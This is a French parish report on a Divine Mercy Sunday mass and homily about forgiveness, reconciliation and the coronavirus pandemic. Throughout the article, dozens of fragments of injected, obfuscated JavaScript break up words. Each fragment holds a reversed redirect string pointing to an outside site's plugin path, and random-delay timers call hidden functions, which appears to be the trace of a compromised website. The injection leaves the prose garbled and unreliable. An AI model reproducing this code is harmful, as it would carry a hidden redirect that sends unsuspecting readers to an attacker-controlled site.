En ce deuxième dimanche du Temps Pascal, c’est le Père Herménégilde Coyitungiye, Recteur du sanctuaire de la Paix et de la Réconciliation de Mont Sion Gikungu, qui a présidé la messe de 9h30. Signalons que ce dimanche est dédié à la Miséricorde divine. Cette dernière, a rappelé le célébrant, a été instaurée par le pape Saint Jean Paul II le 30 avril 2000.

Les textes bibliques sont tirés du livre des Actes des Apôtres (Ac 2, 42-47), de la première épitre de Saint Pierre (1, 3-9), et de l’Evangile selon Saint Jean (20, 19-31).

Dans son homélie, il a souligné que, dans cette période où le monde est tourmenté par la ptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andémie de Coronavirus, c’est un bon moment d’avoir recours à notre Père miséricordieux, lui qui est toujours en faveur de ses créatures. Il y a beaucoup de personnes qui n’ont pas pu célébrer Pâques dignement à cause de la peur de cette ptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andémie. Et par-là, elles commencent à se demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander s’il n’est pas vraiment bon temps pour que le Ressuscité manifeste sa victoire. Le célébrant a mentionné que face aux problèmes de tout acabit, comme les catastrophes, la faim, … notre Seigneur Jésus nous dit : « Avance ton toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doigt ici, et vois mes mains ; avance ta main, et mets-la dans mon côté : cesse d’être incrédule, sois croyant. », comme il l’a dit à Thomas. Le Christ ressuscité vient pour nous dire : « La paix soit avec vous ! »

 

Pour le Père Herménégilde, le Christ ressuscité vient toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner cette salutation de paix à ses disciples qui l’avaient renié le jour de sa passion. C’est par ses blessures qu’ils ont reçues la miséricorde, et que nous-mêmes l’avons reçue. En ce qui nous concerne, il nous demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande de partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner si nous voulons être partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés comme nous l’exprimons dans le « Pater noster ». Ainsi, en ce jour de la miséricorde divine, nous sommes invités à être miséricordieux. C’est dans ce cadre que le célébrant nous a demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andé qu’aujourd’hui nous devrions rentrer chez nous, surtout là où nous croyons avoir des ennemis, pour y annoncer la paix.

En plus, le Père recteur, parlant du sacrement de la réconciliation, il a cité l’injonction du Christ à ses disciples : « Recevez l’Esprit Saint.  A qui vous remettrez ses péchés, ils seront remis ; à qui vous maintiendrez ses péchés, ils seront maintenus. » Il a recommtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andé à ceux qui étaient présents de se rappeler la valeur du sacrement de la réconciliation que Jésus lui-même a institué en ce verset ci-haut cité. Le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don de Dieu que nous recevons en ce sacrement, nous le concevons de plusieurs manières ici chez nous, il va au-delà de l’enlèvement des péchés comme l’expriment ces acceptions du kirundi « impuhwe, imbabazi, ubuntu, umwitwarariko, … » Nous sommes invités à être des instruments fiables de la miséricorde de Dieu, à être des petits crayons dans la main de Dieu comme le disait Mère Teresa de Calcutta.

Nous arrive-t-il quelques fois de compatir avec ceux qui nous ont fait du mal ? Comme les premiers chrétiens, nous devrions apprendre à partager, pas seulement la joie mais aussi les peines ! S’adressant aux pères des familles, le célébrant les a demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andés de se rappeler de leurs familles laissées à la maison qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and ils sont au cabaret. Aux mamans, il a demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andé de se rappeler de leurs de leurs situations familles surtout qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and elles ont besoin de nouveaux styles.

En tant que Chrétiens, nous sommes invités à avoir une même vision ; sinon, il nous est impossible de compatir. Apprenons à compatir car chacun a toujours besoin de l’autre à l’instar des disciples de Jésus et des premières communautés chrétiennes, qui partageaient tous, la foi et leurs fortunes.

Enfin, le célébrant nous a invités à être dans la joie en cette journée où nous rentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons grâce à Dieu pour son amour et son partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don. Nous devrions nous rappeler aussi que la Vierge Marie nous est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnée comme la mère de miséricorde, le refuge des pécheurs et des pauvres malheureux. Dans ce temps difficile que traverse le monde, supplions-la de tourner son regard maternel sur nous, de nous apprendre à être miséricordieux afin que nous puissions être compatissants avec tout le monde.

Fr. Ndahimana Etienne

Laisser un commentaire